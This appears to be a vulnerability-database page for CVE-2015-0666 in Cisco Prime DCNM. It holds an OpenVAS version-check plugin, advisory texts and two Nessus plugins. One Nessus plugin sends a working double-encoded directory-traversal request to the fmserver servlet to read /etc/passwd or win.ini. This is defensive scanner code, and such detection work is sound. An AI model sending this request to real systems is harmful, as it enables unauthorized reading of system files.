Cisco Data Center Network Manager Directory Traversal Vulnerability
2015-04-14T00:00:00
ID OPENVAS:1361412562310105256 Type openvas Reporter This script is Copyright (C) 2015 Greenbone Networks GmbH Modified 2018-10-26T00:00:00
Description
Cisco Data Center Network Manager is prone to a directory-traversal
vulnerability.
###############################################################################
# OpenVAS Vulnerability Test
# $Id: gb_cisco_prime_data_center_network_manager_73479.nasl 12106 2018-10-26 06:33:36Z cfischer $
#
# Cisco Data Center Network Manager Directory Traversal Vulnerability
#
# Authors:
# Michael Meyer <michael.meyer@greenbone.net>
#
# Copyright:
# Copyright (c) 2015 Greenbone Networks GmbH
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
# CPE under which the product is looked up later in this script
# (get_app_port / get_app_version).
CPE = "cpe:/a:cisco:prime_data_center_network_manager";
# Metadata registration. This branch only declares the plugin's identity,
# references, scoring and scheduling requirements, then exits.
if (description)
{
# Identity and external references for the finding.
script_oid("1.3.6.1.4.1.25623.1.0.105256");
script_bugtraq_id(73479);
script_cve_id("CVE-2015-0666");
# CVSS v2 vector: network-reachable, no authentication, confidentiality
# impact only (C:C/I:N/A:N). This matches the file-read impact described below.
script_tag(name:"cvss_base", value:"7.8");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:N/A:N");
script_version("$Revision: 12106 $");
script_name("Cisco Data Center Network Manager Directory Traversal Vulnerability");
script_tag(name:"impact", value:"Exploiting this issue can allow an attacker to gain read access to
arbitrary files. Information harvested may aid in launching further attacks.");
# Detection is by version comparison only; the code after this block sends
# no request to the affected servlet.
script_tag(name:"vuldetect", value:"Checks if a vulnerable version is present on the target host.");
script_tag(name:"insight", value:"This issue is being tracked by Cisco Bug ID CSCus00241.");
script_tag(name:"solution", value:"Update to 7.1(1) or higher.");
script_tag(name:"summary", value:"Cisco Data Center Network Manager is prone to a directory-traversal
vulnerability.");
script_tag(name:"affected", value:"Cisco Prime DCNM releases 6.3(1) and later, prior to release 7.1(1).");
script_tag(name:"solution_type", value:"VendorFix");
# Quality-of-detection class: the verdict rests on a version string obtained
# remotely, so a result means "reported version is in the affected range",
# not "traversal confirmed".
script_tag(name:"qod_type", value:"remote_banner");
script_tag(name:"last_modification", value:"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $");
script_tag(name:"creation_date", value:"2015-04-14 14:19:43 +0200 (Tue, 14 Apr 2015)");
# Information-gathering category, consistent with the version-only check below.
script_category(ACT_GATHER_INFO);
script_family("CISCO");
script_copyright("This script is Copyright (C) 2015 Greenbone Networks GmbH");
# Scheduling: run after the DCNM detection script and only when the version
# key is present in the knowledge base (presumably set by that detection
# script; confirm against gb_cisco_prime_data_center_network_manager_detect.nasl).
script_dependencies("gb_cisco_prime_data_center_network_manager_detect.nasl");
script_require_ports("Services/www", 80);
script_mandatory_keys("cisco_prime_dcnm/version");
exit(0);
}
include("host_details.inc");
include("version_func.inc");
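# Version-only check for CVE-2015-0666 in Cisco Prime DCNM.
# No request is sent to the affected servlet; the verdict depends entirely on
# the version string recorded for the host, so it cannot tell a patched build
# from an unpatched one that reports the same version.

# Port on which the product was registered for this CPE; nothing to do if absent.
port = get_app_port( cpe:CPE );
if( ! port ) exit( 0 );

# Prefer the version stored for this CPE/port, then fall back to the KB key
# named in script_mandatory_keys.
vers = get_app_version( cpe:CPE, port:port );
if( ! vers )
{
  vers = get_kb_item("cisco_prime_dcnm/version");
  if( ! vers ) exit( 0 );
}

# Keep the Cisco-style string (e.g. "7.0(2)") for the report and compare on a
# dotted form: "(" becomes "." and ")" is dropped, so "7.0(2)" -> "7.0.2".
rep_vers = vers;
vers = str_replace( string:vers, find:"(", replace:".");
vers = str_replace( string:vers, find:")", replace:"");

# Affected range per the "affected" tag: 6.3(1) and later, prior to 7.1(1).
# Compare against the fixed release as an exclusive upper bound so that any
# build numbered between 7.1.0 and 7.1.1 (e.g. a 7.1.0.x string) is still
# reported; an inclusive bound of "7.1.0" would skip those.
if( version_is_greater_equal( version:vers, test_version:"6.3.1" ) &&
    version_is_less( version:vers, test_version:"7.1.1" ) )
{
  report = 'Installed Version: ' + rep_vers + '\n' +
           'Fixed Version: 7.1(1)\n';
  security_message( port:port, data:report );
  exit( 0 );
}

# Version is outside the affected range.
exit( 99 );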
{"id": "OPENVAS:1361412562310105256", "type": "openvas", "bulletinFamily": "scanner", "title": "Cisco Data Center Network Manager Directory Traversal Vulnerability", "description": "Cisco Data Center Network Manager is prone to a directory-traversal\nvulnerability.", "published": "2015-04-14T00:00:00", "modified": "2018-10-26T00:00:00", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105256", "reporter": "This script is Copyright (C) 2015 Greenbone Networks GmbH", "references": [], "cvelist": ["CVE-2015-0666"], "lastseen": "2019-05-29T18:36:31", "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-0666"]}, {"type": "nessus", "idList": ["CISCO_PRIME_DCNM_7_1_1_LOCAL.NASL", "CISCO_PRIME_DCNM_FMSERVER_DIR_TRAVERSAL.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:14365"]}, {"type": "cisco", "idList": ["CISCO-SA-20150401-DCNM"]}, {"type": "zdi", "idList": ["ZDI-15-111"]}], "modified": "2019-05-29T18:36:31", "rev": 2}, "score": {"value": 6.8, "vector": "NONE", "modified": "2019-05-29T18:36:31", "rev": 2}, "vulnersScore": 6.8}, "pluginID": "1361412562310105256", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_cisco_prime_data_center_network_manager_73479.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# Cisco Data Center Network Manager Directory Traversal Vulnerability\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; 
without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:cisco:prime_data_center_network_manager\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105256\");\n script_bugtraq_id(73479);\n script_cve_id(\"CVE-2015-0666\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:N/A:N\");\n script_version(\"$Revision: 12106 $\");\n\n script_name(\"Cisco Data Center Network Manager Directory Traversal Vulnerability\");\n\n script_tag(name:\"impact\", value:\"Exploiting this issue can allow an attacker to gain read access to\narbitrary files. 
Information harvested may aid in launching further attacks.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"This issue is being tracked by Cisco Bug ID CSCus00241.\");\n script_tag(name:\"solution\", value:\"Update to 7.1(1) or higher.\");\n script_tag(name:\"summary\", value:\"Cisco Data Center Network Manager is prone to a directory-traversal\nvulnerability.\");\n script_tag(name:\"affected\", value:\"Cisco Prime DCNM releases 6.3(1) and later, prior to release 7.1(1).\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-04-14 14:19:43 +0200 (Tue, 14 Apr 2015)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"CISCO\");\n script_copyright(\"This script is Copyright (C) 2015 Greenbone Networks GmbH\");\n script_dependencies(\"gb_cisco_prime_data_center_network_manager_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"cisco_prime_dcnm/version\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\n\nif( ! vers = get_app_version( cpe:CPE, port:port ) )\n if( ! vers = get_kb_item(\"cisco_prime_dcnm/version\") ) exit( 0 );\n\nrep_vers = vers;\n\nvers = str_replace( string:vers, find:\"(\", replace:\".\");\nvers = str_replace( string:vers, find:\")\", replace:\"\");\n\nif( version_in_range( version:vers, test_version:\"6.3.1\", test_version2:\"7.1.0\" ) )\n{\n report = 'Installed Version: ' + rep_vers + '\\n' +\n 'Fixed Version: 7.1(1)\\n';\n\n security_message( port:port, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n", "naslFamily": "CISCO", "immutableFields": []}
{"cve": [{"lastseen": "2021-02-02T06:21:20", "description": "Directory traversal vulnerability in the fmserver servlet in Cisco Prime Data Center Network Manager (DCNM) before 7.1(1) allows remote attackers to read arbitrary files via a crafted pathname, aka Bug ID CSCus00241.", "edition": 6, "cvss3": {}, "published": "2015-04-03T10:59:00", "title": "CVE-2015-0666", "type": "cve", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0666"], "modified": "2015-09-29T19:31:00", "cpe": ["cpe:/a:cisco:prime_data_center_network_manager:7.0\\(1\\)", "cpe:/a:cisco:prime_data_center_network_manager:6.3\\(1\\)", "cpe:/a:cisco:prime_data_center_network_manager:7.0\\(2\\)", "cpe:/a:cisco:prime_data_center_network_manager:6.3\\(2\\)"], "id": "CVE-2015-0666", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0666", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "cpe23": ["cpe:2.3:a:cisco:prime_data_center_network_manager:7.0\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:prime_data_center_network_manager:7.0\\(2\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:prime_data_center_network_manager:6.3\\(2\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:prime_data_center_network_manager:6.3\\(1\\):*:*:*:*:*:*:*"]}], "zdi": [{"lastseen": "2020-06-22T11:41:31", "bulletinFamily": "info", "cvelist": ["CVE-2015-0666"], "edition": 3, "description": "This vulnerability allows remote attackers to read arbitrary files, and bypass authentication, on a system with vulnerable installations of Cisco Data Center Network 
Manager. Authentication is not required to exploit this vulnerability. The specific flaw exists within the fmserver servlet which is vulnerable to a directory traversal. An attacker can leverage this vulnerability to read arbitrary files, including operating system files, as the service is installed with SYSTEM privileges by default. An attacker can also bypass webapp authentication because the application writes access tokens to the filesystem, which can be read.", "modified": "2015-06-22T00:00:00", "published": "2015-04-03T00:00:00", "href": "https://www.zerodayinitiative.com/advisories/ZDI-15-111/", "id": "ZDI-15-111", "title": "Cisco Data Center Network Manager FileServlet Information Disclosure Vulnerability", "type": "zdi", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}}], "cisco": [{"lastseen": "2020-12-24T11:41:38", "bulletinFamily": "software", "cvelist": ["CVE-2015-0666"], "description": "A vulnerability in the fmserver servlet of Cisco Prime Data Center Network Manager could allow an unauthenticated, remote attacker to retrieve arbitrary files from the filesystem.\n\nThe vulnerability is due to invalid input validation on the supplied path information. An attacker could exploit this vulnerability by executing a directory traversal attack on an affected system. A successful exploit could allow the attacker to disclose arbitrary file contents on the underlying operating system that hosts the Cisco Prime DCNM application. The file contents must be readable by the System user for Cisco Prime DCNM running on Microsoft Windows, or the root user for Cisco Prime DCNM running on Linux for the attacker to exploit them.\n\nCisco Prime Data Center Network Manager (DCNM) contains a file information disclosure vulnerability that could allow an unauthenticated, remote attacker to retrieve arbitrary files from the underlying operating system.\n\nCisco has released software updates that address this vulnerability. 
\n\nWorkarounds that mitigate this vulnerability are not available.\n\nThis advisory is available at the following link:\n\nhttp://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20150401-dcnm[\"http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20150401-dcnm\"]", "modified": "2015-04-01T15:45:40", "published": "2015-04-01T16:00:00", "id": "CISCO-SA-20150401-DCNM", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20150401-dcnm", "type": "cisco", "title": "Cisco Prime Data Center Network Manager File Information Disclosure Vulnerability", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:59", "bulletinFamily": "software", "cvelist": ["CVE-2015-0666"], "description": "fmserver servlet directory traversal", "edition": 1, "modified": "2015-04-09T00:00:00", "published": "2015-04-09T00:00:00", "id": "SECURITYVULNS:VULN:14365", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14365", "title": "Cisco Prime Data Center Network Manager directory traversal", "type": "securityvulns", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}], "nessus": [{"lastseen": "2021-04-01T01:42:12", "description": "According to its self-reported version number, the Cisco Prime Data\nCenter Network Manager (DCNM) installed on the remote host is affected\nby a directory traversal vulnerability in the fmserver servlet due to\nimproper validation of user-supplied information. 
An unauthenticated,\nremote attacker, using a crafted file pathname, can read arbitrary\nfiles from the filesystem outside of a restricted path.", "edition": 31, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2015-04-10T00:00:00", "title": "Cisco Prime Data Center Network Manager < 7.1(1) Directory Traversal Vulnerability", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-0666"], "modified": "2021-04-02T00:00:00", "cpe": ["cpe:/a:cisco:prime_data_center_network_manager"], "id": "CISCO_PRIME_DCNM_7_1_1_LOCAL.NASL", "href": "https://www.tenable.com/plugins/nessus/82701", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(82701);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2018/11/15 20:50:20\");\n\n script_cve_id(\"CVE-2015-0666\");\n script_bugtraq_id(73479);\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCus00241\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20150401-dcnm\");\n\n script_name(english:\"Cisco Prime Data Center Network Manager < 7.1(1) Directory Traversal Vulnerability\");\n script_summary(english:\"Checks the DCNM version number.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A network management system installed on the remote host is affected\nby a directory traversal vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the Cisco Prime Data\nCenter Network Manager (DCNM) installed on the remote host is affected\nby a directory traversal vulnerability in the fmserver servlet due to\nimproper validation of user-supplied information. 
An unauthenticated,\nremote attacker, using a crafted file pathname, can read arbitrary\nfiles from the filesystem outside of a restricted path.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20150401-dcnm\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d7202716\");\n script_set_attribute(attribute:\"see_also\", value:\"https://tools.cisco.com/security/center/viewAlert.x?alertId=37810\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Cisco Prime Data Center Network Manager 7.1(1) or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/04/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/04/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/04/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:prime_data_center_network_manager\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2018 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_prime_dcnm_installed_win.nasl\", \"cisco_prime_dcnm_installed_linux.nasl\");\n script_require_ports(\"installed_sw/Cisco Prime DCNM\");\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\n\nappname = \"Cisco Prime DCNM\";\n\nget_install_count(app_name:appname, exit_if_zero:TRUE);\ninstall = get_single_install(app_name:appname, exit_if_unknown_ver:TRUE);\n\nver = install['version'];\npath = install['path'];\ndisplay_ver = install['display_version'];\n\n# Cisco Prime DCNM releases 6.3(1) and later, prior to release 7.1(1)\nif (\n (ver_compare(ver:ver, fix:'6.3.1.0', strict:FALSE) < 0 ||\n ver_compare(ver:ver, fix:'7.1.1.0', strict:FALSE) >= 0)\n) audit(AUDIT_INST_VER_NOT_VULN, appname, display_ver);\n\nport = get_kb_item('SMB/transport');\nif (!port) port = 0;\n\nif (report_verbosity > 0)\n{\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + ver +\n '\\n Fixed version : 7.1(1)\\n';\n security_hole(port:port, extra:report);\n}\nelse security_hole(port);\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2021-04-01T01:42:12", "description": "The version of Cisco Prime Data Center Network Manager (DCNM)\ninstalled on the remote host is affected by a directory traversal\nvulnerability in the fmserver servlet due to improper validation of\nuser-supplied input. 
An unauthenticated, remote attacker, using a\ncrafted file pathname, can read arbitrary files from the filesystem\noutside of a restricted path.", "edition": 32, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2015-04-13T00:00:00", "title": "Cisco Prime Data Center Network Manager < 7.1(1) Directory Traversal Vulnerability", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-0666"], "modified": "2021-04-02T00:00:00", "cpe": ["cpe:/a:cisco:prime_data_center_network_manager"], "id": "CISCO_PRIME_DCNM_FMSERVER_DIR_TRAVERSAL.NASL", "href": "https://www.tenable.com/plugins/nessus/82740", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(82740);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2018/11/15 20:50:20\");\n\n script_cve_id(\"CVE-2015-0666\");\n script_bugtraq_id(73479);\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCus00241\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20150401-dcnm\");\n\n script_name(english:\"Cisco Prime Data Center Network Manager < 7.1(1) Directory Traversal Vulnerability\");\n script_summary(english:\"Attempts to read a file on the remote host.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A network management system installed on the remote host is affected\nby a directory traversal vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Cisco Prime Data Center Network Manager (DCNM)\ninstalled on the remote host is affected by a directory traversal\nvulnerability in the fmserver servlet due to improper validation of\nuser-supplied input. 
An unauthenticated, remote attacker, using a\ncrafted file pathname, can read arbitrary files from the filesystem\noutside of a restricted path.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-15-111/\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20150401-dcnm\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d7202716\");\n script_set_attribute(attribute:\"see_also\", value:\"https://tools.cisco.com/security/center/viewAlert.x?alertId=37810\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Cisco Prime Data Center Network Manager 7.1(1) or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/04/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/04/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/04/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:prime_data_center_network_manager\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2018 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_prime_dcnm_web_detect.nasl\");\n script_require_keys(\"installed_sw/cisco_dcnm_web\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\nappname = \"Cisco Prime DCNM\";\napp_id = \"cisco_dcnm_web\";\nget_install_count(app_name:app_id, exit_if_zero:TRUE);\n\nport = get_http_port(default:80);\ninstall = get_single_install(app_name:app_id, port:port);\n\npath = install['path'];\ninstall_url = build_url(qs:path, port:port);\n\n# Try to retrieve a local file.\nos = get_kb_item(\"Host/OS\");\nif (os && report_paranoia < 2)\n{\n if (\"Windows\" >< os) files = make_list('/windows/win.ini', '/winnt/win.ini');\n else files = make_list('/etc/passwd');\n}\nelse files = make_list('/etc/passwd', '/windows/win.ini', '/winnt/win.ini');\n\nfile_pats = make_array();\nfile_pats['/etc/passwd'] = \"root:.*:0:[01]:\";\nfile_pats['/winnt/win.ini'] = \"^\\[[a-zA-Z]+\\]|^; for 16-bit app support\";\nfile_pats['/windows/win.ini'] = \"^\\[[a-zA-Z]+\\]|^; for 16-bit app support\";\n\nforeach file (files)\n{\n url = path + \"/fmserver/\" + crap(length:15*10, data:\"%252E%252E%252F\") + file ;\n res = http_send_recv3(method:\"GET\", item:url, port:port, exit_on_fail:TRUE);\n\n if (egrep(pattern:file_pats[file], string:res[2]))\n {\n security_report_v4(\n port : port,\n severity : SECURITY_HOLE,\n file : file,\n request : make_list(build_url(qs:url, port:port)),\n output : chomp(res[2]),\n attach_type : 'text/plain'\n );\n exit(0);\n }\n}\naudit(AUDIT_WEB_APP_NOT_AFFECTED, appname, install_url);\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}}]}